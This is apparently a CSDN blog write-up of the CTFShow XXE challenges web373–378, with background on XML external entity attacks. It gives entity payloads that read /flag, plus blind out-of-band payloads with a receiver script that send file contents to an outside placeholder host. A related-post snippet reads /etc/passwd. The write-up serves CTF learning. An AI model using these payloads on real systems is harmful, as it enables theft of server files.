CTFSHOW-web入门-XXE

已于 2022-05-18 21:56:23 修改
阅读量5.7k 收藏 3
点赞数 1
文章标签: 安全 web安全
于 2022-04-23 23:20:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whisper921/article/details/124371974
版权

XML

XML即 可扩展标记语言(EXtensible Markup Language),是一种标记语言,其标签没有预定义,您需要自行定义标签,是W3C的推荐标准。其于HTML的区别是:

  • HTML 被设计用来显示数据
  • XML 被设计用来传输和存储数据

XML文档结构包括:

  • XML声明
  • DTD文档类型定义(可选)
  • 文档元素

XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。

在解析外部实体的过程中,XML解析器可以根据URL中指定的方案(协议)来查询各种网络协议和服务(DNS,FTP,HTTP,SMB等)。 外部实体对于在文档中创建动态引用非常有用,这样对引用资源所做的任何更改都会在文档中自动更新。 但是,在处理外部实体时,可以针对应用程序启动许多攻击。 这些攻击包括泄露本地系统文件,这些文件可能包含密码和私人用户数据等敏感数据,或利用各种方案的网络访问功能来操纵内部应用程序。 通过将这些攻击与其他实现缺陷相结合,这些攻击的范围可以扩展到客户端内存损坏,任意代码执行,甚至服务中断,具体取决于这些攻击的上下文。

XXE漏洞主要针对web服务危险的引用的外部实体并且未对外部实体进行敏感字符的过滤,从而可以造成命令执行,目录遍历等。

对于传统的XXE来说,要求攻击者只有在服务器有回显或者报错的基础上才能使用XXE漏洞来读取服务器端文件,如果没有回显则可以使用Blind XXE漏洞来构建一条带外信道提取数据。

xxe漏洞存在是因为XML解析器解析了用户发送的不可信数据。然而,要去校验DTD(document type definition)中SYSTEM标识符定义的数据,并不容易,也不大可能。大部分的XML解析器默认对于XXE攻击是脆弱的。因此,最好的解决办法就是配置XML处理器去使用本地静态的DTD,不允许XML中含有任何自己声明的DTD。通过设置相应的属性值为false,XML外部实体攻击就能够被阻止。因此,可将外部实体、参数实体和内联DTD 都被设置为false,从而避免基于XXE漏洞的攻击。

web373

题目给出源码,一个有回显的文件读取漏洞

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);
?>

抓包发送如下内容

<?xml version="1.0"?>
<!DOCTYPE xml [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<H3rmesk1t>
	<ctfshow>
		&xxe;
	</ctfshow>
</H3rmesk1t>

得到flag 

web374

无回显的文件读取,需要进行外带

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__); 
?>

抓包发送如下内容

<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml">
%remote;
%send;
]>

在服务器放置xxe.php 和 xxe.xml 两个文件

<?php
$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web375

无回显的文件读取,且禁用了版本号,和上面一样进行外带不写版本号即可

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>

抓包发送如下内容

<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml">
%remote;
%send;
]>

在服务器放置xxe.php 和 xxe.xml 两个文件

<?php
$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web376

无回显的文件读取,且禁用了版本号,和上面一样进行外带不写版本号即可

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
?>

抓包发送如下内容

<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % remote SYSTEM "http://xxx.xxx.xxx.xxx:xxxx/xxe.xml">
%remote;
%send;
]>

在服务器放置xxe.php 和 xxe.xml 两个文件

<?php
$content = $_GET['1'];
if(isset($content)){
    
      
    file_put_contents('flag.txt','更新时间:'.date("Y-m-d H:i:s")."\n".$content);
}else{
    
      
    echo 'no data input';
}

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx.xxx:xxxx/xxe.php?1=%file;'"
>
%all;

web377

payload

import requests

url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'
payload = """<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>123</root>"""
payload = payload.encode('utf-16')
requests.post(url ,data=payload)

开监听拿flag

web378

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
whisper921
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
网络安全实战从 0 到 1 彻底掌握 XXE
zxcvbnmasdflzl的博客
03-27 1245
网络安全实战从 0 到 1 彻底掌握 XXE
[GoogleCTF2019 Quals]Bnv-XXE学习记录
cjdgg的博客
03-06 1382
[GoogleCTF2019 Quals]Bnv-XXE学习记录 XXE学习知识点XMLDTD内部实体外部实体通用实体参数实体实例做题应用([GoogleCTF2019 Quals]Bnv) 知识点 XML 这里先了解下xml的基本格式 - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - XML 必须正确地嵌套。 - XML 文档必须有根元素。 - XML 的属性值须加引号 看一个例子 <bookstore> <!--根元素--> <book
ctfshow-web入门——爆破(web21-web28)
dzqxwzoe的博客
02-02 928
[在这里插入图片描述](https://img-[在这里插入图片描述](https://img-payload type选Custom iterrator,position1填admin,position2填:,position3导入字典,按照上面步骤直接爆破。
XXE之利用本地DTD进行文件读取
合天网安学院
09-23 1305
0x00 前言现在题目出XXE一般都是考如何获取到XXE所包含文件的数据,即如何把数据泄露出来。常用的方法有:引入外部服务器或者外部dtd文件,来实现OOB带外信息传送,如果服务器和你的...
xml 前言中不允许有内容_CTFweb类型(二十八)xml、dtd及blind xxe基础讲解
weixin_39936403的博客
11-04 300
点击上方蓝色字体,关注我们接下来的话就开始讲xxe的相关内容,我们先来了解一下xxe的一个基本概念。概念全称是 xml的外部实体注入漏洞,会很明显的感觉到,和xml有非常密切的关系的。所以一开始会先讲xml的一些相关基础知识,然后再讲到一些具体的案例。xxe漏洞,它是发生在一个应用程序去解析xml输入的时候,没有禁止外部实体的加载。所以它的关键点其实是在一个外部实体的作用在这里,或者说很...
CTF-[XXE学习记录]
qq_53142368的博客
06-07 942
1.XXE 关于xml我就不详细说了,想看的话从我之前的文章找找,有关于xml的概念和怎么构造。 XML的设计宗旨是传输数据,而非显示数据。XML是不作为的,XML是不会做任何事情,XML 被设计用来结构化、存储以及传输信息。 XML是纯文本,且允许创作者定义自己的标签和文档结构,是独立于软件和硬件的信息传输工具。 0x01.DTD 文档类型定义(DTD)可定义合法的XML文档构建模块,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 1.内部的DOCTYPE声明 假如DTD被包含在XML源
WEB漏洞—文件下载读取
holen_的博客
01-26 519
文件被解析,则为文件包含漏洞 显示源代码,则为文件读取漏洞 提示文件下载,则为文件下载漏洞 凡是存在文件下载的地方都可能存在文件下载漏洞,该漏洞不会直接导致权限丢失,但会间接的影响 比如得到数据库配置文件,那就可能得到数据库密码,从而登录数据库。 Pikachu靶场文件下载漏洞复现 我们查看下“科比.布莱恩特”图片位置 是这个地址: http://pika:89/vul/unsafedownload/download/kb.png 再来看看这张图片的下载地址,是这个: http://pika:89/v..
ctfshow--web入门--XXE
weixin_74985952的博客
07-29 131
这里增加了对http关键字得过滤,可以采用编码得方式进行绕过。这里我在brup上直接编码发送没有成功,然后看了其他人得解法,用的python进行了utf-16得编码然后发包。至于为什么要这样我也不太清楚,有没有大佬知道为什么,指点一下小弟。这一关过滤了xml声明标签还有version关键字,把payload中的xml声明去掉即可。这一关和xxe-lab中很相似,直接抓包构造payload即可。这一关是无回显读取文件。
[ctf web]XXE通过DTD读取文件+XML和DTD基础语法(以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例)
ShenZ的博客
08-23 619
XML基础 XML文件可以分为三部分: XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。 文档元素 <foo><note category="COOKING"></note></foo> 根元素foo,子元素note,属性category XML语法 XML被设计为传输和存储数据 基本语法: - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X
XXE漏洞学习
qq_62078839的博客
04-23 374
漏洞原理 XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞,xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。 利用方式 命令执行 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a[ <!ENTITY test SYSTEM "命令"> ]> <c>&test</c>
CTFShow-Web入门
weixin_58546222的博客
12-04 2228
CTFShow-信息收集
XXE - 防御策略-01
09-15
XXE - 防御策略-01
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
XXE - How to become a Jedi
02-20
XXE漏洞从入门到精通
awesome-web-security
04-28
为解决此问题,这里有一份精选的Web安全材料和资源列表,用于学习尖端的渗透技术,我强烈建议您阅读本文“ ” 请在之前阅读。 :rainbow: 想增强您的渗透能力吗? 我建议玩一些 。 如果您喜欢这个很棒的清单并想...
人工智能安全与光明时代
qq18218628646的博客
04-19 753
模式许可和监督可能会适得其反,因为以不可持续的方式集中权力
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本内容是否安全--最终版
最新发布
qq_39951524的博客
04-22 299
小程序前端调用接口(getAccessToken)获取调用凭据,调用接口(msgSecCheck)检测文本你在前端测试时,最好使用**小程序工具的真机调试**,是可以跑通的,但你用**小程序工具的真机预览模式**就会没有响应。原因就在于访问**wx.request({})**,中的**服务器网址** ,需要在**小程序开发管理** 》》**开发设置** 》》 **服务器域名** 中配置,而小程序提供的接口**https://api.weixin.qq.com** ,又恰恰**不允许**在服务器域名中配置,
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 744
网络攻防~
ctfshow web 入门xxe
08-23
根据提供的代码和引用内容ctfshow是一个XML实体节点,而xxe是用来指代外部实体的名称。在给定的代码中,XML实体被加载并解析成一个SimpleXMLElement对象,然后从中提取了ctfshow节点的值,并进行输出。通过提供合适的XML实体值,可以利用XXE(XML外部实体注入)漏洞来执行一些攻击,比如读取文件内容等。 要利用XXE漏洞进行ctfshow的Web入门,可以构造一个恶意的XML实体,例如: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test> <ctfshow>&xxe;</ctfshow> </test> 这个恶意的XML实体中,xxe指向了文件/etc/passwd,当这个实体被解析时,它的值会被替换为/etc/passwd文件的内容。通过将这个构造好的XML实体发送给目标服务器,可以触发XXE漏洞并读取/etc/passwd文件的内容。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web入门 XXE web373~web378](https://blog.csdn.net/qq_62989306/article/details/126839849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [ctfshow web入门 XXE](https://blog.csdn.net/jie_a/article/details/117532704)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值